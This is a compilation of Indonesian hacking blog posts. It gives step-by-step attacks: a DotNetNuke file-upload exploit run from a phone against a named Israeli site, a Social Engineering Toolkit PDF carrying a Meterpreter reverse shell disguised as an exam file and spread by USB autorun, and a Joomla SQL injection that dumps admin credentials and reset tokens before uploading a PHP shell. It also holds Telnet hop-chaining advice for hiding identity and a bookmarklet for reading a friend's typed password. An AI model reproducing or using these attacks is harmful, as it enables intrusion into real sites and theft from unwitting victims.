0 Hacking Website Melalui Hanphone

Mungkin kedengarannya gila bila membaca judul diatas….! ‘it’s imposible‘  kata beberapa orang, Saya hanya seorang Newbie yg selalu pgn mencoba, maaf bila postingan ini dah basi dan untuk para master jangan dibaca ya coz dah jadul.

Pada dasarnya aplikasi web browser di HP maupun di PC it cara kerjanya sama,yg membedakan adalah system yg bekerja mendukung applikasi it sendiri (Java, SymBian, Linux, Windows, Android etc). Dan ukuran atau kapasitas serta kemampuan menampilkan web. Tapi pada dasarnya cara kerjanya tetap. Sama, jadi apa yg bisa dilakukan lwt pc,kmgknan bsa jg dikerjakan lwt hape…!

Nah yg coba saya bahas disini adalah exploit web dgn cara hack web melalui DNN (dot net nuke) exploit
melalui hape.

Bahan2 yg kita butuhkan adalah:

1. Operamini browser versi 5.0
2. Operamini browser versi 4.2

Kenapa pake 2 Web Browser ?

Lebih enak pake 2 browser di atas.alasannya adalah:

1. Operamini 5.0 mendukung multi tab jadi cocok buat mencari target dan mengetesnya   tanpa harus open close satu2.

2. Operamini 5.0 mempunyai kemampuan copi paste,pilih text dan lgsg mensearchnya dlm sekali klik ditab yg sama ataupun membukanya di tab baru.

3. Operamini 4.2 respon browser lbh bagus dr yg v 5.0

Setelah cek target dr opmin 5.0 dan ternyata vuln tgl copy kan aja linknya di operamini 4.2 .
Tgl kta exploit lwt situ..
(Operamini 4.2 tdk multi tab,untuk yg multi tab slhkan cari di opera modif di google)

Nah sekarang memasuki langkah2 atau cara2 melakukan hack web dgn DNN exploit melalui opera mini.

Pertama: pastikan anda masih mempunyai saldo pulsa
Kedua: buka operamini v 5.0 anda dan ketik di kolom google search dorknya->
inurl:”/portals/0″  
And search!!…
Nah dapet kan??
Tinggal kita pilh target yang pas di hati.dan kali ini saya coba di situs orang israel.
Taruh cursor di link target trus tekan angka 1 di keypad hape anda.
Pilih open in new tab.
Begitu seterusnya untuk link target yg lain sampai keluar beberapa tab.
Oh,ya untuk mengetahu gimana ,apa dan bagaimana DNN exploit it silahkan baca disini:
http://securityreason.com/exploitalert/6234

Next, misalkan kita dah dpt targetnya nih…

Example site:
http://fril.co.il/portals/0/cwindex.txt
Spti keterangan di securityreason di atas kita coba potong link target dan menggantinya dgn
/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  
->http://site.com/[path]/portals/0/a.txt
Menjadi
->http://site.com/[path]/Providers/HtmlEditorProviders/ Fck/fcklinkgallery.aspx  

Lakukan it pada smua target yg udah kamu buka pada browser operamini 5.0 km.biar gak bolak balik
copas lagi.

Setelah dapet dan pasti vuln seperti site di bawah ini.

http://fril.co.il//Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Copy dan pastekan di opera 4.2 kamu.
Nb:Alasannya knapa pindah browser yaitu pada opera 5.0 di hape saya kurang respon pada perintahupload. Proses upload berjalan tapi file tidak terupload dan begitu di coba di v 4.2 sukses terupload. Tapi bila di v.5.0 km bisa ya lanjut aja disitu.gak ush pndah applikasi.
Lanjut proses.!

Setelah site target di buka di opmin 4.2

Pilih : file ( select a file on your site)

Tunggu biar loading selesai dan menampilkan 2 kolom:

Kolom 1 biasanya tulisan ‘root’
Kolom 2 berisi macam2 file.
Setelah loading selesai hapus link di addres bar operamini kamu dan ganti dgn script di bawah ini:
javascript:__doPostBack(‘ctlURL $cmdUpload’,”)

Lalu klik ok….

Kolom yg tdnya berisi ‘root’ dan ‘jenis2 file’
Skrg ganti menjadi kolom ‘root’ dan kolom kosong untuk upload file.
Nah skrg tgl km upload tuh file txt yg udah km simpan di hape km.
SUCCESS..! you cAn hacked a web site from mobile phone.

Hasilnya seperti ini http://fril.co.il/portals/0/xadal.txt < 100% lewat handphone

Nb: angka 1 di operamini berfungsi untuk copas,select text and open new tab.
-sekian-

0 Hacking CMS Lokomedia

ok saya disini mau melakukan pentest sedikit dengan backtrack ~_^

kata temen saya dari IBT hack Windows itu adalah Sesuatu :))

tapi disini saya pake tutor dari salah seorang teman dari Binushacker

Thanks For articel nya,... ~_^



ok sebelum nya kita CTRL + ALT + T lalu masuk folder /pentest/exploits/set.

setelah itu jalan kan Social Engineering Toolkit Dengan perintah ./set




Pilih Nomor 3 “Infectious File Generator” lalu pilih nomor 1 “File
Format Exploit“, dan selanjutnya masukkan IP address penyerang(komputer
kita) Ip Vmware Saya : 192.168.110.128



Pilih format exploit yang hendak digunakan…disini saya gunakan menggunakan “Adobe PDF Embedded EXE social engineering “.



Langkah berikutnya yaitu memilih file PDF yang akan digunakan untuk menyerang.




Kalau kawan-kawan punya file PDF sendiri, itu jauh lebih bagus
soalnya begitu si korban buka dia ngga terlalu curiga, jadi disini kita
pilih nomor 1.




Langkah berikutnya adalah memilih payload atau apa yang ingin kita
dapat dari korban jika ia meng-klik exploit yang kita buat. Disini saya
memilih nomor 2 “Windows Meterpreter Reverse_TCP shell”




Berikutnya adalah melakukan setting connect back, maksudnya adalah
ketika exploit berhasil dijalankan, pada port berapakah kita akan
menangkap koneksi tersebut? disini saya gunakan port 80(kenapa harus
port 80? nanti lihat di sumber aja ya)



Ketika muncul pertanyaan “Do you want to create a listener right now? [yes|no]” pilih YES.




Semua file yang berhasil di-generate oleh SET tersimpan pada folder
/pentest/exploits/set/autorun, tetapi nama file tersebut agak
mencurigakan & kurang menarik sehingga lebih baik jika kita rubah
terlebih dahulu penamaan file tersebut.

masuk ke folder autorun :

cd /pentest/exploits/set/autorun



Lakukan perintah ini

pico autorun.inf




Didalam file autorun.inf, rubah template.pdf menjadi nama file yang
menarik agar korban mau membuka file tersebut. Berikut adalah isi
autorun.inf yang saya buat :

[autorun]

open=Soal_UAS_2011_Aljabar.pdf

icon=autorun.ico

Lalu tekan CTRL + O untuk melakukan SAVE dan CTRL + X untuk keluar.



Langkah selanjutnya adalah menamai template.pdf menjadi nama yang telah kita definisikan pada autorun.inf dengan perintah mv.

mv template.pdf Soal_UAS_2011_Aljabar.pdf



Selesai sudah, selanjutnya tinggal meng-copy kan semua file yang ada dalam folder autorun tersebut ke dalam USB anda.




Ketika victim mencolokkan USB dan autorun komputernya dalam keadaan
aktif, maka ia akan otomatis membuka file PDF yang tadi telah kita buat.


Ketika ia meng-klik OK untuk setiap alert yang muncul, maka : muncul
Command CMD dari komputer korban Yang berarti kita Sukses! ~_^




Thanks For : bogel | Rusuh | Recogn1z3d | Ditatompel | Liyan oz |
Zee_eichel | N41s3N | Dzhenway | joglo | mywisdom | _Gunslinger | Civo
| CitoOZz_Bandhitozz | Ketek | wenkhairu | Poni | reka flazer |
Rzr_kidz | And All My Friend | And You.


  Special Thanks : lutfi oXside | Reload-x | Devilzc0de | hacker-newbie
| pak rt | Balicoder | reka flazer | F-H-I |
  Lampung Hacker Crew| BinusHacker | And All my forum.

dan terutama terima kasih kepada teman saya yang buat articel di binushacker ~_^



Narasumber : http://www.binushacker.net/hacking-windows-dengan-backtrack-set-usb.html



Maaf ya All Gak ane sertain dengan video Soal nya ane baru pake backtrack ^__^

klo Untuk Lebih Jelas Silahkan ke narasumber nya ,...

maaf tulisan nya kebanyakan dari narasumber tapi gw edit dikit ^__^

dari arti kel ini seperti meterpreter tapi dengan payload yang encrypt dengan extensi.pdf :D



semoga bermanfaat

0 Hacking menggunakan Telnet

Berikut adalah panduan untuk mempelajari teknik dasar hacking. Telnet adalah dasar dari sebagian besar hacking.

Hal ini berjudul seperti ini akan dimasukkan ke dalam Burn Pertanyaan Group.

Saya memahaminya dengan arti, "Bagaimana terjangan melalui Telnet," sehingga yang instructable ini adalah tentang.

Download Stuff

Satu-satunya hal yang akan anda perlukan port scanner. nmap adalah gratis dan canggih port scanner. Anda dapat men-download-nya untuk Windows, Mac OSX, atau Linux. Jika mungkin pastikan Anda memasang GUI dengannya. Ia datang dengan Windows installer.

Menggunakan Zenmap (nmap's GUI)

Ini mudah. Buka program dan di "Target" kotak, ketik alamat IP dari komputer Anda ingin menetakkan.

Jika Anda tidak mengetahui alamat IP, pergi ke komputer Anda ingin akses (saya akan berasumsi bahwa Anda memiliki hak hukum untuk apapun yang Anda mencoba untuk mengakses), membuka sebuah command line dan ketik ipconfig. Anda dapat mencoba untuk perangkat terjangan terlalu kadang-kadang. Router dan kadang-kadang telah beralih Telnet. Coba pemindaian ini juga.

Katakanlah Anda ingin memindai kisaran alamat IP, maka Anda akan ketik awal diikuti oleh alamat IP (tanpa spasi) kaya (-) dan akhir terakhir alamat IP. Misalnya, jika Anda ingin memindai 192.168.1.100 ke 192.168.1.299 maka Anda akan jenis 192.168.1.100-299.

Dalam "Profil" Zenmap menu, pilih "Meningkatnya scan" jika belum dipilih. Klik scan dan menonton sebagai program memindai komputer atau perangkat untuk membuka pelabuhan. Menonton nmap output sampai anda melihat beberapa kata dalam warna hijau. Ini adalah membuka port pada komputer atau perangkat. Jika port 23 terbuka, Anda adalah perangkat hackable.

Banyak server dan router memiliki port 23 terbuka.

Jika Anda tidak dapat menemukan perangkat dengan Telnet diaktifkan, gunakan nethack.alt.org.

Pastikan bahwa Anda tidak membuat hacking instructables di sekolah

Saya mulai ini instructable di laboratorium komputer dari masyarakat kampus. Saya segera mendapatkan pesan yang mengatakan bahwa apa yang saya lakukan dianggap aktivitas yang mencurigakan. Saya rasa port scanner adalah apa yang ia lakukan. Saya dapat posting gambar dari pesan, tetapi mereka diblokir akses internet ke komputer saya. Ya baik, saya duga saya akan menyelesaikan ini di rumah.

Memulai program Telnet

Sekarang Anda dapat men-download dan beberapa program Telnet. Jadi sudut yang? Sebagian besar datang dengan sistem operasi Telnet Tapi yang dibangun Windows, klik Start -> Run (atau Windows Kunci + R) dan jenis Telnet dalam kotak. Ini akan membuka Telnet layar.

Memulai sambungan

Pada Jenis kotak Telnet "o TheAddressOfTheComputerYouWantToConnectTo PortNumber"

Anda akan ingin menggunakan alamat IP yang Anda temukan pada port 23 terbuka, atau permainan, nethack.alt.org.

Misalnya, menggunakan kami sebagai Telnet nethack.alt.org server Anda akan ketik "o nethack.alt.org 23".

Jika Anda tidak mengetik nomor port, itu berarti Anda akan menganggap 23.

Sekarang tekan enter untuk koneksi.

Bermain dengan perangkat Anda terhubung ke

Sekarang di sini adalah di mana ia akan mendapatkan sedikit lebih sulit bagi saya untuk menjelaskan. Alasan ini adalah bahwa setiap perangkat memiliki antarmuka dari sini. Beberapa akan memerlukan kode, dan lain-lain akan membawa Anda meskipun dengan program ini, secara bertahap. Nethack merupakan permainan yang Anda bermain.

Salah satu hal yang paling mudah untuk menetakkan melalui Telnet, adalah sebuah router Cisco. Semua router Cisco memiliki Telnet server dibangun in Untuk mempelajari Cisco "bahasa" pergi ke website ini.

Bila tersambung ke router Cisco Anda akan mendapatkan sesuatu yang mirip dengan gambar di bawah ini. Jenis "mengaktifkan" dan Anda dapat menggunakan hak-hak modus. Setelah memasukkan privilege mode, ketik "config t" untuk mengkonfigurasi router.

umping

Cara paling hacker untuk menggunakan Telnet terjangan, Telnet adalah untuk satu perangkat dari komputer mereka. Mereka menggunakan perangkat tersebut untuk membuka sambungan ke tempat lain. Mereka melakukan ini beberapa kali di berbagai belahan dunia untuk melindungi identitas mereka sendiri. Mereka ingin menargetkan rumah yang tidak tahu bahwa mereka menjalankan Telnet server. Mereka menggunakannya karena jika mereka tidak menyimpan log koneksi, maka akan sulit bagi siapapun untuk melacak mereka jika masalah hukum menjadi masalah. Hacker dapat mengambil besar menggunakan sistem Telnet, tetapi paling utama perusahaan memasang perlindungan terhadap serangan jenis ini.

Biar saya mengingatkan Anda bahwa ketika sedang tidak melanggar hukum untuk menggunakan Telnet pada item Anda sendiri atau memiliki izin untuk, sangat ilegal untuk menggunakan sistem Telnet untuk menyakiti Anda tidak memiliki izin untuk. Panduan ini dimaksudkan sebagai alat untuk menetakkan ke item Anda sendiri. Banyak Linksys router memiliki Telnet mereka. Orang menggunakan Telnet sebagai sarana untuk membuat daya dikirim ke antena (wireless router) yang lebih kuat. Ini pada gilirannya, membuat sinyal yang lebih kuat.

0 Trik Speed ngacir buat yang pake paket Flash Unlimited 50k atau 100k (Hack Bandwidth Flash)

Trik ini emang tidak Full gretong,,
kita harus ngeluarin kocek sedikit nya 50k (untuk 14hr)
atau 100k (untuk 30hr)
tp jgn khawatir,,,kita bisa siasatin kuota yg di bundle sama paket si kampret yg katanya cuma 500 mb bisa nyampe ber giga2... hehehehe.... TESTED sebulan full gan!!

lumayan lah gan buat sedot data bisa ngacir sampe 250 kbps - 300kbps


tahap pertama :
# yang belum reg silahkan reg ke *363# pilih paket yg sesuai... mau 50k atau 100k

# setelah selesai,,set apn di modem agan dengan internet

# save dan set as default,,tutup aplikasi modem..


tahap kedua :

# siapin tool buat loncatin kodok nya (mdma dan dan reconnect dial) >> trik yg masih ampuh sampe saat ini buat sedot bandwith si kampredd...!!

# pada mdma set gprs/edge only terlebih dahulu..

# dial si kampret dr reconnect dial..ini di gunakan untuk jaga2 disco ya gan...

# setelah konek cek ip client nya,,kalo ane seh demen sama kepala 182 pada paket ini

# selanjut nya buka broser agan,, lalu masuk link speedtest,,, misalnya http://speedtest.indosatm2.com/ atau link2 lain yg menyediakan speedtest bandwith kita....

# silahkan mulai speedtest dengan klik start pada link td

# untuk mendapatkan bandwith yg kenceng,,,koneksi agan sampe disini harus tetep gprs/edge only..

# begitu hasil angka PING keluar pada speedtest td,,,skrng agan pindah kan koneksi nya pada 3G only pada aplikasi mdma nya...

tools : 
http://www.mediafire.com/?nvcscx7m64ooifp
http://www.mediafire.com/?ryo80rzc41508o3
credit : rifqi36 @n3

tools : 
http://www.mediafire.com/?nvcscx7m64ooifp
http://www.mediafire.com/?ryo80rzc41508o3
credit : rifqi36 @n3

0 Step By Step Joomla Hacking

Step By Step SQL Injection "joomla"

********************************************************************************​******
* title : exploit joomla : com_huruhelpdesk + reset password + pasang php shell
* author : ho1onk
* site : http://ho1onk.fairtopic.com
********************************************************************************​******

============= PENGANTAR ============
khusus bagi teman2 yang 
ga doyan donlod, jaringan lelet/lola
mungkin ini bisa jadi solusi
====================================


==========
[+] step 1
==========

buka google.. ketik keyword 
Code:
"inurl:/index.php?option=com_huruhelpdesk\"

tes satu per satu
coba kita ambil yang ini

 

[+] step 2

==========

pasang exploit..

Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7+from+jos_users--

 tu admin nya... :P
nampak..


==========
[+] step 3
==========

coba kita reset password nya

Code:

/index.php?option=com_user&amp;view=reset

hm.. minta email dia.. masukin aj email admin tadi..

enter..



==========
[+] step 4
==========

minta activation pula 
hmm.. gimana ne?
tenang.. kita cari dulu activationnya
Code:

/index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1/**/union/**/select/**/1,2,3,concat(username,0x3a,password,0x3a,email,0x3a,activation),5,6,7+from+jos_u​sers--

tu kluar activatifasinya
hehehe
:)
lanjut...

copas aja ke yang tadi.. enter.. :)


==========
[+] step 5
==========

copas aja ke yang tadi.. enter.. :)

:P

==========
[+] step 6
==========

wkwkkw
minta pasword baru tu.. kasih aja..
hehhehe 

 ==========

[+] step 7
==========

OK langsung aja masuk ke admin nya..
:)
Code:

http://[site]/[pacth]/administrator

wkekwekwke

==========
[+] step 8
==========

masuk ternyata.. heheh
sabar².. 

nah.. di sini ente harus ubah dulu "Global configuration" nya
lalu setelah itu masuk ke "media manager"

==========
[+] step 9
==========

nah.. kita ke gloal configuration terlebih dahulu

ubah media settingnya, tambahin aja php

jangan lupa di save..
:D

==========
[+] step 10
==========

OK 
lanjut..
buka media manager..

nah, ini tahap terakhir..

upload lah shell php mu..
kwkekwkekwe :)
seep selesai..

bila tidak ada tulisan berwarna merah berrti berhasil..

shell kita ada di sini

Code:

http://[site]/[pacth]/images/namashell.php

OK sekarang terserah ente.. mau apain tu site..

saran ane.. kalo bisa..
uploada aja lagi shell di directory yang lain..
lalu hapus shell yang di directory images tadi..

sekian aja dulu
selamat mencoba.. :D 

0 Cara upload javascript di Google Code

Cara upload javascript di Google Code >> Javascript sering digunakan dalam dunia blog untuk menampilkan halaman seuai yang kita inginkan,contohnya adalah salah satu javascript untuk menampilkan efek salju pada blog ataupun untuk menampilkan cursor bertabur bintang seperti dibawah ini:

<script src="http://sabarmuanas.googlecode.com/files/infonetmu.blogspot.com.cursor-bintang-hijau.js" type="text/javascript"></script>

Jika kamu meletakkan javasript tadi ke html widget blog kamu maka cursor pada blog kamu akan bertabur bintang berwarna hijau, emm...lalu bagai manakah mengupload javascript milik kamu sendiri?
diatas adalah javascript yang saya upload di google code, jika kamu ingin menguploadnya lagi agar jadi milik kamu sendiri caranya sebagai berikut:

• Log In terlebih dahulu ke akun Google kamu
• .Setelah itu kunjungi Google Code Hosting
• Lalu akan muncul halaman di bawah ini, Klik Create a New Project
  
  
  Isilah data-data di bawah ini :
  
  
  
  isilah nama project kamu juga deskripsinya seusui keinginan kamu,sedangkan versioncontrol system pilih mercurial dan Source code license pilih GNU GPL v3Lalu klik create project Setelah berhasil maka akan menuju halaman Project Home, Untuk memulai download klik menu download.
  
  
  
  Setelah itu Masukkan data dan File Java Script yang akan di Upload'
  
  
  
  
  Setelah Isian di atas di isi Sekarang Tinggal Klik Submit File, Tunggu sampai proses Upload selesai. Lalu Klik File yang sudah kita Upload tadi untuk mendapatkan Link Location nya.
  
  
  
  Klik Kanan Pada Gambar yang di beri garis kotak. lalu pilih Link Location
  
  
  
  Tinggal di save deh Copy Link nya dan Selesai.
• 
  

Gimana susah ga ? Sekian Postingan kali ini tentang Cara Hosting File Java Script Lewat Google Code kalau ada yang perlu ditanyakan silahkan untuk berkomentar.

0 Trik Usil Melihat Password Facebook

Cara melihat Password Facebook, E-Mail, Kaskus, dll
Kali ini saya akan berbagi tips yang berbau hacking sob. Walau masih level beginner, tapi itung-itung kan bisa memperdalam ilmu kita tentang unia hacking sob. Oke, kali ini saya akan share bagaimana cara melihat password Facebook, Twitter, E-Mail, Kaskus, dll. Pokoknya yang terdapat passwordnya.

Melihat password di sini bukan berarti kita membobol akun tersebut, melainkan melihat tulisan ********. Jadi ketika kita biasanya hendak menuliskan password kita kan simbolnya bintang-bintang atau lingkaran hitam, nah dengan trik ini maka password itu akan kelihatan. Trik ini bisa kita pakai untuk melihat password teman kita. Tinggal suruh teman kita untuk log in dengan laptop atau komputer kita.

... Dan berikut trik nya :
1. Buka situs yang memerlukan password, seperti Facebook, Kaskus, dll (belum semua situs saya coba)
2. Masukkan E-Mail dan Password di kolom yang tersedia. Eitsss,,jangan tekan tombol Log In dulu
3. Jika sudah, copy script di bawah ini tanpa tanda petik dan paste pada adress bar (tempat dimana kita menulis alamat situs, paste pada tab yang kita buka tadi).

" javascript:var a = new String(); for (var i = 0; i < document.forms.length; i++) { for (var j = 0; j < document.forms[i].elements.length; j++) { if (document.forms[i].elements[j].type == "password") {a += document.forms[i].elements[j].value; } } } alert(a); "

TIPS USIL : Untuk sobbat Blogger yang akan mengerjai teman anda, suruh dia log in dengan laptop sobbat Blogger tapi jangan tekan tombol Log In dulu. Suruh dia untuk pergi, entah suruh beli makanan atau mengambil sesuatu. Nah, lalu mulailah aksi sobbat Blogger.